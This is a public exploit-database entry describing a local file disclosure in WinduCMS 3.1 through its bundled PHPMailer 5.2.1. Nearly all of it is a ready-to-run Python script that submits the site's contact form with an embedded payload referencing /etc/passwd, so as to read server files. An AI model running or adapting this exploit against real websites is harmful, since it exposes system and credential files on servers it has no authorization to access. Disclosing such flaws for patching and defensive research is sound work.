WinduCMS 3.1 Local File Disclosure

2017.12.04
Credit: Maciek Krupa
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/python # # Exploit Title: WinduCMS <= 3.1 - Local File Disclosure # Date: 2017-12-03 # Exploit Author: Maciek Krupa # Vendor Homepage: http://windu.org # Version: 3.1 # Tested on: Linux Debian 9 # # // Description // # # Local File Disclosure vulnerability exists in WinduCMS through a vulnerable PHPMailer version 5.2.1 used here # # // PoC // # # It requires a contact form present on the website # # Example: {{W name=contactForm inputs="name" email="root@localhost"}} # from requests_toolbelt import MultipartEncoder import requests print("WinduCMS <= 3.1 Exploit") url = 'http://localhost/contact_page?mn=contactform.message.negative' email = 'attacker@example.com' payload = '<img src="/etc/passwd"' form_input = 'name' fields = {'form_key': 'contactForm', form_input: 'Attacker', 'email': email, 'content': payload} m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundary1500777958139315') headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 'Content-Type': m.content_type} print('Sending payload to target...') r = requests.post(url, data=m.to_string(), headers=headers) if r.status_code == 200: print('Exploited.')


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top